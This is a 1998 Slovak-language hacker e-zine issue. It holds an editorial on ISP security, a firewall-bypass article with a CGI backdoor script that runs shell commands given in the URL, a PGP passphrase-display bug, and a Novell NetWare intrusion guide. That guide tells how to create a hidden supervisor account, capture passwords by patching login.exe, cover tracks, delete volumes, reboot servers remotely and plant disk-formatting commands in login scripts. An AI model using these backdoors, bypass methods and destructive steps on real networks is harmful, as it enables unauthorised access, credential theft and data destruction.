::::::::::. :::::::.. :::.,:::::: ::: ... . : `;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;; `]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ \[[,[[[[, ,[[[[, $$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$ 888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM prielom #4, 20.3.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/obsah
predchadzajuce tri cisla prielomu nemali takuto vymozenost vyventilovat sa na diskusnom boarde, preto pokial mas nutkanie vyjadrit sa k hocijakemu tematu z predoslych prielomov, mozes tak ucinit na tomto vydani :)
pokial xcete dostavat e-mailom oznam ked vyde nove cislo prielomu, poslite mejl s textom "subscribe prielom" na adresu prielom(at)hysteria.sk.
pajka, bratislava, 15.3.98
Takto nejspis vypada situace u vetsiny firem. Nu co, nakonec jsou to jejich informace a jejich stroje a pokud neciti potrebu se o ne v dostatecne mire starat - resp. administrator, ktery cely den hraje Quake2 jim nejspis vyhovuje, je to jejich vec. O co vice je vsak situace zalostnejsi, vezmeme-li v uvahu providery, tedy poskytovatele internetu. Ti uz nejsou odpovedni pouze za svoje udaje, ale predevsim za udaje svych zakazniku, kteri jim pravidelne plati mnohdy nemale castky a presto je situace na poli provideru vetsinou stejna, ne-li jeste horsi. Abych nemluvil stale tak obecne, za vsechny bych zminil alespon cesnet a lanprojekt, kteri si nejspis uz zvykli na to, ze svoje servery budou navzdy sdilet s backdoory cZertu. Situace tedy neni nikterak ruzova a nezbyva nez doufat, ze vedouci pracovniky v personalnim oddeleni osviti duch svaty a obeznami je s kriterii, ktera jsou adekvatni pro administratory unixovy a jinych serveru a na patricnych mistech nebudou sedet jako dosud, pouze ruzni readeri how-to dokumentu, ale lide, kteri si vyznam sve prace uvedomuji a vedi co obnasi. Potom se mozna zacne blyskat na lepsi casy.
erixon, erixon(at)hysteria.sk
navrat na obsah
co ty na to ? board
Pred zhruba dvoma rokmi nastal v cechach a na slovensku boom firewallov. Ftedy k nam dorazila (asi s dvojrocnym oneskorenim) sialena modna vlna Internetu z Ameriky. (poznamka bokom - to dvojrocne oneskorenie trendov na ceskom a slovenskom internete oproti USA je vlastne take male pravidlo, ktore som si viackrat overil v praxi. Tuto teoriu som nazval PPPP (tm) : Pajkovo Pravidlo Postupneho Prielomu. Funguje to tak ze sa staci pozriet na to co sa deje momentalne v USA na Inete a pripocitat dva roky - a mozete fascinovat ludi na vecierkoch presnymi predpovedami diania na slovenskom a ceskom internete. fakt to funguje :)
Nie ze by si vramci toho inetovskeho boomu ludia uvedomovali potrebu bezpecnosti pocitacovych sieti. To vobec nie. Za rozsirenie firewallov v nasich podnikoch mozeme dakovat skupinam ludi ktori este doftedy montovali PCka, predavali kancelarsky software a tonery do tlaciarni, a ktori zacali (pod nalepkou "data security firma" alebo nieco podobne, zvycajne trapne anglicky znejuce :) predavat aj firewally a strasit manazerov vidinou nejakych imaginarnych skupin sfanatizovanych "hackerov", ktori 24 hodin denne pod vlpyvom heroinu utocia na uctovnicku databazu vaseho podniku. Takychto firmiciek je ako hub po dazdi a nedivme sa, firewall totiz stoji v priemere okolo sto tisic korun. Nikto ale vlastne nevie kolko by presne taky firewall *mal* stat, takze nie je problem nadhodit si na cenu slusnu proviziu. Naviac sa na Slovensku a v Cechach vacsina firewallovych produktov predava prostrednictvom exkluzivnych dealerov, ktori maju v moci urcit cenu pre cele slovensko a obcas strielaju od pasa astronomicke sumy. Bezpecnost je mozno jedna z mala oblasti Internetu kde su momentalne slusne prachy. Mozno je lepsie pri kupe firewallu pobrowsovat si po Webe a najst si v USA alebo v Zapadnej Europe firmu ktora takyto software ponuka, ale ktora nema exkluzivne zastupenie na Slovensku a kupit software priamo od vyrobcu.
Nesnazim sa kritizovat fakt ze pouzivanie firewallov je natolko rozsirene. Kritizujem fakt ze firewally su take drahe, aj ked sa nejedna o zlozite programy. Tiez si myslim ze firewally su pouzivane tam, kde to nie je opodstatnene (napriklad akademicka sfera) a castokrat firewally zbytocne limituju legitimnych uzivatelov. Problem je tiez, ze z terminu "firewall" sa vyvinulo magicke slovo, za ktorym si ludia predstavuju genialny nastroj na *dokonale* zabezpecenie siete. Admin nainstaluje firewall a mysli si ze to ma v suchu. Tento clanok sa pokusi vyvratit tieto tvrdenia a tiez naznacit moznosti ako moze legitimny uzivatel ofajcit limitacie firewallov.
V sucastnosti uz azda kazda firma s pevnou linkou na inet ma aj nejaky ten software na filtrovanie alebo blokovanie trafficu. Konfiguracie firewallov sa daju zhruba rozdelit do tychto styroch kategorii :
1. Zakazanie "nebezpecnych" portov.
Blbost, vyslovena blbost. Z historickych dovodov sa kategorizuju niektore porty ako "nebezpecne". jedna sa napriklad o rexec, rlogin alebo rsh. v dnesnej dobe vsak nie je problem modifikovat tieto sluzby tak, aby sa odstranili tie vlastnosti, ktore niekto moze pokladat za bezpecnostny nedostatok. konkretne ide napriklad o pouzivanie trust vztahov (.rhosts a podobne). Na priklad na Linuxe ktory pouziva PAM Security sa daju tieto sluzby upravit v pam.conf tak, aby vzdy vyzadovali autentifikaciu cez heslo.
Firewall v takomto pripade neplni ziadne uzitocne funkcie. pokial su zablokovane niektore vybrane sluzby, akurat to obmedzuje uzivatelov. Potencialny utocnik si takyto firewall sotva vsimne. Uvediem jeden priklad : robil sa testovaci utok na jeden stroj v edit.cz domene. Po dosiahnuti root prav sa nadviazala komunikacia so strojom cez 80 port pomocou backdooroveho cgi scriptu ktory interpretoval prikazy zadavane cez web browser(backdoory z cgi scriptov mam rad, niet nad to pochlipkavat espresso v inet kaviarni a zadavat priamo prikazy na unix server cez Netscape). cely cas sa absolutne nedalo netusit ze na danej sieti sa nachadza firewall. zistilo sa to az pri pokuse telnetnut sa na port 5002 (inetd backdoor), ktory bol zakazany.
pokial ste zamestnanec takehoto podniku, mozete vychutnat jedinu pozitivnu stranku tekejto konfiguracie - mozete veselo a neobmedzene surfovat po inete, spravit si trebars na svojom desktope FTP server, a pod..
2. Zakazanie vsetkych portov okrem vybranych portov
Vacsina konfiguracii podnikovych firewallov spada do tejto kategorie. Administrator vacsinou zablokuje vsetky porty okrem par vybranych sluzieb, trebars 25 (smtp posta), 110 (pop posta) a 80 (http web). server ktory poskytuje spomenute sluzby umiestni za firewall a umozni na neho obojsmerny traffic. Pokial ste utocnik vonku za firewallom, alebo obmedzeny uzivatel vo vnutornej sieti, staci ak pouzijete na komunikaciu jeden z otvorenych kanalov. napriklad pokial chcete nabehnut telnet server na stroji za firewallom, staci ak zmenite defaultny telnet port z 23 na 80. Alebo pokial chcete, staci na server vo vnutri siete nahodit takyto cgi script:
#!/bin/sh /bin/echo -n "Content-type: text/htm\n\n" /bin/echo "<pre>\n" $*a potom mozete zadavat unix prikazy na server zvonku cez hocijaky browser ako parameter cgi scriptu, napriklad :
http://www.server.sk/cgi-bin/script.cgi?ls+-la+/tmp
To vam spusti a vypise prikaz "ls -la /tmp".
Pokial chcete pouzit zakazanu sluzbu z vnutornej siete, musite ju presmerovat
cez otvoreny port, napriklad cez spominany port 80. Toto docielite pomocou tzv.
redirektorov. ak pouzijete trebars program redir-0.7, ktoreho linux a sun
verzie su na arxive (http://hysteria.sk/arxiv/), treba ho nabehnut niekde vonku
za firewallom tak, aby pocuval na povolenom porte 80 a spojenie presmeroval
na vami pozadovany stroj a port.
Tu je konkretny priklad: vas firewall napriklad povoluje obojsmerny traffic na porte 80, ale zakazuje spojenie na irc servery, port 6667. Nehorazna nuda v praci a silna zavislost na IRC vas prinuti uvazovat nad sposobom, ktory by vam umoznil si z prace spustit irc klient a zabit cas bezduchym tliachanim na nejakom kanali. Staci ak vonku za firewallom na masine server.vonku.sk nabehnete redir s tymito parametrami :
./redir 80 irc.felk.cvut.cz 6667 &
Potom vam staci nastavit si na vasom klientovi irc server na server.vonku.sk:80. Vase spojenie pojde cez povoleny port 80 a dostane sa na vonkajsi redirektor, ktory vsetky data bude posielat dalej na irc.felk.cvut.cz 6667, co je priklad irc servera.
3. Firewall nepovoluje akekolvek spojenia ktore idu zvonku do vnutornej siete a zvnutra povoluje spojenia do internetu iba na niektore povolene porty
Toto je vysoky stupen bezpecnosti. Pokial sa napriklad banky alebo vladne urady pripajaju na internet, volia zvycajne tuto moznost. Pokial pracujete na lokalnej sieti ktora je takto zabezpecena a xcete si trebars nabehnut zvonka x-term, alebo pouzit irc - nezufajte. mozete opat pouzit spomenuty redirektor a presmerovat spojenie cez port, ktory je povoleny.
Druha moznost je pouzit TCP tunel. Pri tejto metode bezi jeden program na vasej masine, alebo na nejakej masine vnutri na lokalnej sieti, a druhy program bezi na stroji vonku na internete. Program vnutri za firewallom sa vola tunel, ten sa spoji s programom ktory je vonku, ten sa vola portal. Ked sa tieto dva programy spoja, vytvoria tunel na TCP komunikaciu.
Nazorny priklad :
Goof: tvoja masinka.
Foo : nejaka ina masinka vo vnutri firewallu, alebo ta ista ako "Goof", na nej bezi "tunel"
Bar : stroj na opacnej strane firewallu, bezi "portal"
Boof: masina na ktoru sa chcete finalne pripojit
FIREWALL tunel ^ portal ######### ^ ######### # Foo #======================# Bar # ######### ^ ######### | ^ | | ^ | | ^ | ######### ^ ######### # Goof # ^ # Boof # ######### ^ ######### FIREWALLsedite na masine Goof a chcete si nabehnut X-kovy program z masiny Boof, takze si na Boof-e nastavite display premennu na svoj stroj Goof, a nabehnete X-kovy program, trebars xterm, ale vobec sa k vam nedostane, lebo sa zastavi na firewalle.
Takze nabehnes tunel na masine Foo a nastavis ho tak, aby sa pripojil na masinu Bar, napriklad na povolenom porte 7000 (tam bezi portal). Zaroven nastavis tunel tak aby ti posielal vsetky TCP spojenia ktore idu naspat z portalu na tvoju masinu Goof na port 6000 (X-Windows). Nabehnes portal na masine Bar a nastavis ho aby pocuval tunel na porte 7000. Ked je tunel pripojeny, portal pocuva na porte 6001 na prichadzajuce X spojenia. Vzdy ked sa nejaka X-aplikacia pripoji na portal, spojenie sa presmeruje cez tunel, ktory spojenie nasmeruje na masinu Goof, na port 6000.
Na zaver musis nastavit display premennu na masine Boof na Bar:1 (v tcsh shelli napis 'setenv DISPLAY bar:1, v bash shelli 'export DISPLAY=bar:1'), co prikaze aplikacii aby pouzila port 6001 (nemozeme pouzit port 6000 ak bezi na tej masine X-server, ktory uz blokuje port 6000). Nabehni Xeyes a zazmurkaju ti na obrazovke.
Na tento popisany sposob dokonca nepotrebujete mat nikde ani root prava. Obidva spomenut programy, tunel a portal, si mozete stiahnut z arxivu (http://hysteria.sk/arxiv/) (musim to furt opakovat ? :) tunel a portal maju okrem ineho aj vyhodu ze sa daju skompajlovat na solarise, irixe, freebsd, hpux a linuxe. Redir 0.7 funguje iba na solarise a linuxe.
4. Firewall nepovoluje ziadne spojenia zvonku ani zvnutra, povolene sluzby su pristupne iba cez proxy server
Toto je maximalne zabezpecenie. Zakazat uplne vsetko a Web, FTP a trebars Gopher povolit iba cez proxy server. V takomto pripade ste fakticky odkazani iba na tieto sluzby, nepomoze vam ziaden redirektor ani tunel. Web je vsak plny sluzieb, ktore vam mozno umoznia cez browser uskutocnit to, co Vam firewall zakazuje. Mam na mysli verejne sluzby ktore umoznia cez WWW citat postu z lubovolneho POP servera, IRC -> WWW interfasy a podobne.
Zaver
Neocakavajte na zaver sebavedome vyhlasenie typu "vidite ? firewally su nanic !". Nebola by to vobec pravda. Dobre nakonfigurovany firewall dokaze rozumne ochranit podnikovu siet pred utokom zvonka. Zaroven vsak casto obmedzuje a limituje uzivatelov. Pri troske sikovnosti a casu vsak nie je problem oblafnut firewall vyssie popisanymi metodami, predpokladom je vsak vzdy ze mate fyzicky pristup na masiny na lokalnej sieti za firewallom.
pajka
modry bod za popis tuneloveho systemu patri bishnu(at)hotmail.com, pouzil som preklad jeho clanku z phracku 52. phrack najdete na www.phrack.com
navrat na obsah
co ty na to ? board
zaciatok. bola z toho velka radost. zarazilo ma len jedno, preco by som mal platit, ked skola dostala internet zadarmo, neplati ani linku a server dostala sponzorskym darom, ale ...
skratka a jasne
WIWAT S(R)ANET
navrat na obsah
co ty na to ? board
O co ide, pgp vo verzii 5.0 prichadza s GUI. Holt chybicka se vloudila prave v tejto casti programu.
Takze podme k veci. V aplikacii PGPkeys sa da velmi lahko menit password k vasmu pgp klucu tzv. passphrase.(click na key, prave tlacitko, property, change passphrase). Po kliknuti vybehnu na vas 3 text boxy a jeden check box, check box urcuje polozku hide typing(fakt nechapem na co to je dobre, kto to kedy videl pisat si passwordy visible).
Mame zaskrknute hide typing a dame sa do pisania hesla, a tu je zmienena chybicka, programatori asi riesili hide typing pisanim bieleho textu na biely podklad a zjavne nemysleli na taku moznost, ze niekoho napadne ten "hide typing" selektovat. Cize staci po dopisani hesla stlacit shift+home, prip. to nejakym inym sposobom selektnut, a vidime co sme napisali.
Podobna chybicka sa vyskytuje aj pri dekodovani pgpcknutych suborov na disku: *.pgp prave tlacitko PGP->decrypt vypyta si to password a mi piseme (samozrejme s "hide typing"). Tu je na tom pgp trochu lepsie, neumozni totiz selektnut ten text pomocou shift+home ani shift+sipka s5, musime to selektnut mysou a aj to nie hocijako. Nestaci iba stlacit lavy button a selektovat ale treba ist na to fintickou. Finticka je nasledovna. Stlacime shift a klikneme mysou na zaciatok a co sa nam neobjavi, nas password. :-)
Je jasne ze toto nie je velmi zavazny bug.. keby take nieco bolo v nejakom freewarovom programceku, je mozne ze sa nad tym clovek ani nepozastavi.. ale predsa si uvedomte ze ked je tam tento bug moze tam byt aj omnoho zavaznejsi.. a to by v takom softwari ako je PGP nemalo byt.
JeboZLesa
navrat na obsah
co ty na to ? board
i) ako sa dostat dnu
Predpoklad 1. : Mas pristup ku konzole
takze potom nemas velmi vela prace - stiahni si burglar.rar, rozbal,
nahraj na disketu, pridi ku konzole, strc disketu do konzolovej
mechaniky, prepni na prikazovy riadok (zacina ":" a medzi jednotlivymi
obrazovkami sa prepina pomocou - a + klaves ( 3.12 ) a ALT + ESC
( 3.11 ), to prepinanie je nutne, lebo na konzole vacsinou bezi
monitor (soft monitorujuci siet), moze tu vsak byt ten problem, ze
konzola je chranena setricom, ktory pozaduje supervisorske heslo, v
takom pripade hop smola, ale musis skocit na Predpoklad 2.) a napis
"load a:\burgral.nlm ktosi". (a: to je meno mechaniky, kde je disketa,
moze to byt samo aj b:) nasledne nato je vytvoreny ktosi, kto ma
supervisorske pravo. prv nez odides od konzoly, tak je dobre vycistit
obrazovku prikazom "clear" a prepnut do povodnej obrazovky. je dobre
tiez potom resetovat server (to sa nenapadne robi dosti tazko), lebo
loadovanie modulov sa loguje. ale da sa predpokladat, ze ked konzolu
nechas v tom stave ako bola, teda prepnes na povodnu obrazovku, tak
si admin nic nevsimne. ked si takto schoval vsetky stopy, tak staci
len prist k hociktorej stanici, nalogovat sa ako ktosi ("f:\login
ktosi") a bez hesla mas supervisora.
Predpoklad 2. : Mas pristup len ku stanici
no tak toto je uz horsie. pozri si teraz stanicoviny na novellackom
archive. k cielu sa teraz mozes dopracovat niekolkymi sposobmi. prva
moznost je brute force, teda typovanie hesiel - aj to je moznost. ak
je vsak zapnuta funkcia "intruder detection", tak sa moze stat, ze
napriklad po 3. neuspenom pokuse je uzivatelsky ucet zablokovany
(teda aj ked napises spravne heslo, tak sa dnu nedostanes) a teda
admin sa to coskoro dozvie. ked toto nie je zapnute mozes skusit
nejaky program ktory tieto utoky automatizuje - napriklad lsrip.rar.
veelkou nevyhodou novellu je jedna skutocnost, ze sa hesla NEDAJU NIJAK
DEKODOVAT. totiz neexistuje nieco like a /etc/passwd. ale je tu vsak
jedna moznost. novell, ked je pripojeny k inetu, tak vacsinou
sprostredkuva spojenie lokalnym pocitacom a sam vsetko adresuje na
nejaky unix (linux), ktory mu tvori branu do sveta. a kedze tento
linux bude na 95 percent spravovany tymi istymi ludi ako novell, a
clovek je tvor lenivy, tak sa da predpokladat, ze budu mat na linuxe
a novelly rovnake hesla. na linuxe z toho okamzite vyhodu nemas, ale na
novelly budu mat tito ludkovia urcite supervisorsku eq., co ti vlastne
otvori branicku do sveta. takze len treba dekodovat hesla :)). a ma to
este jedno pluz - novellacke hesla nje su case sensitive, teda je jedno
ci napises "lamer" alebo "LaMeR".
dalsou moznosto ako hacknut novell zo stanice, je pouzite programov, ktore vyuzivaju slabiny v prenosovom IPX protokole. jedna asi o to, ze program patricne upravi hlavicky paketov, aby vyzerali ako keby isli z pocitaca, na ktorom je prihlaseny supervisor. da to to tiez tak, ze sa upravi prerusenie ktore pouzivana novell tak, aby uvadzalo inu adresu pocitaca. su na to programy novhack.zip, nw-hack.zip a nwrsh.zip. tie prve dva pozaduju aby bol na hlaseny supervisor a az potom rozbehnu svoju cinnost. urobia to, ze pridaju vsetkym existujucim uzivatelom supervisorsku eq. pri sietach s velkym poctom uzivatelov to utvori peknu paseku :)).nw-hack.zip tiez zmeni supervisorske heslo na "SUPER_HACKER". trochu z ineho sudka je ta posledna jutilita. totiz nepozaduje superuzivatela, staci ked jej zadate niekoho, kto je prave nalogovany a ma supervisorsku eq. (zisti to jutilita view.zip) a uz zapracuje, treba skusit.
dalsia moznost je pekne kostrbata. je to popisane v nwhack.rar. nebudem sa tym velmi zaoberat, lebo nutnostou na jej fungovanie je to, ze supervisor NESMIE mat login script (teda v adresari \MAIL\1 nesmie byt subor "login"). ak to tak je tak potom sa da vyuzit nadherna finta, totiz skupina everyone ma implicitne pravo na vytvaranie sub. do \MAIL\ vratane podadresarov. ked teda supervisor nema login script, mozeme mu ho elegnatne vytvorit a tak napriklad nainstalovat propa, alebo vymazat cely disk skratka vsetko naco ma supervisor prava. kto takuto vec objavil na "svojom" servery, nech konzultuje nwhack.rar.
ii) ako dnu zostat.
predpokladam, ze sa vam podarilo nejak prepracovat k supervisorskej eq. teraz ale stojite pred problemom ako si ju udrzat.
security.exe
toto je velmi neprijemna vec. ma vlastne kontrolovat zapezpecenie
siete. prejde vsetkymi uzivatelmi a zistuje ci dany uzivatel ma heslo,
ci nema prilis vysoke prava (supervisorske pravo k zvazku SYS) atd.
skratka ak to admin pusti a vy mate vytvoreneho nejakeho uzivatela,
ktory (ten ktosi :))) ma supervisorsku eq. tak uz ako keby ste ho
nemali. takze treba siahnut po nejakej lepsej metode. totiz idealna
metoda je kompromisom v sikovnosti prace s nou (lognutie sa na uzivatela
so super eq. bez hesla) a medzi bezpecnostou tejto metody (staci jedno
security.exe a je to f prdeli). jednym z moznych rieseni je
zachytavanie hesiel. totiz takto si v podstate nechytitelny a vzdy ked
potrebujes, tag sa lognes na dajakeho jusera s super eq. a urobis co
treba. idealnou metodou je pouzitie programu prop.rar. teda patchnutie
login.exe. postup je na stranke + f readmi, ktore je s programom.
jedna poznamocka k tomuto. je velmi dobre predtym ako prepises
login.exe pozriet si vsetky informacie o povodnom (owner suboru, datum
vtvorenia, posledneho editovania etc.) pomocou jutility filer, zapisat
si dolezite udaje a po prepisani to vsetko nastavit do povodneho tvaru.
riziko sa tym podstatne znizi.
dalsia metoda je switchable super eq. umoznuje ti to program super.zip. riziko je tu to, ze security.exe pri uzivatelovi takto upravenom zatrubi na poplach s hlaskou, ze uzivatelsky zaznam dotycneho nje je v poriadku. hlaska ktoru zavesi je presne citovana v readmi, ktore je v zipe.
a na zaver jedny elegantne zadne dvierka z parkerovej kuchyne. ked mame supervisorske pravo tak pridame skupine everyone pravo na modifikovanie a citanie suborov (+MR -modify, read) v adresari \MAIL\. tymto tahom mozes modifikovat login script kazdeho usera.a tak sa v pohode dostanes dnu, ked ta vymknu. staci len patricne editovat login script spravneho uzivatela, aby spustal potrebne programy. napriklad propgram tempsup.exe - vytvorenie superuzivatela bez hesla, ktory musi byt spusteny zo supervisorskeho uctu.
iii) trochu "srandy".
hmm. ked uz visite v novelly velmi dlho, nje od veci trochu "sprijemnit" adminom zivot. takze zopar akcii, po ktorych ich bude chvilku riadne boliet hlava :))
zmazanie vsetkeho, co je nejakom zvazku - namapujte si dotycny zvazok
(prikaz map, alebo sa to da urobit aj cez session) a pouzite nasledne
dosovksu jutilitku deltree.
zablokovat logovanie juserov - dve moznosti su tu. pouzit fconsole,
alebo jednoducho zmazat adresar LOGIN.
odpojit uzivatela od servera - potrebujes samozrejme super eq. a potom
fconsole a Connection informations, potom sa nastavis na obet, stlacis
DEL a potvrdis enterom. jedna neprijemna vec - odpajanie sa loguje do
system error logu.
reboot servera na dialku - nutne je tu supervisorske heslo. ked ho mas,
tak pekne spustis rconsole a po jeho napisani sa dostanes na obrazovku
konzoly (preto Remote CONSOLE). potom napises (do prikazoveho riadka
samo) "remove dos" a nasledne "down" a je to.
editovanie login scriptov inych uzivatelov - mozes im tam pridat rozne
motivacne hlasky, or rovno prikaz na format pevneho disku stanice, z
ktorej sa nahlasili.
enjoy
ice, ice(at)hysteria.sk
navrat na obsah
co ty na to ? board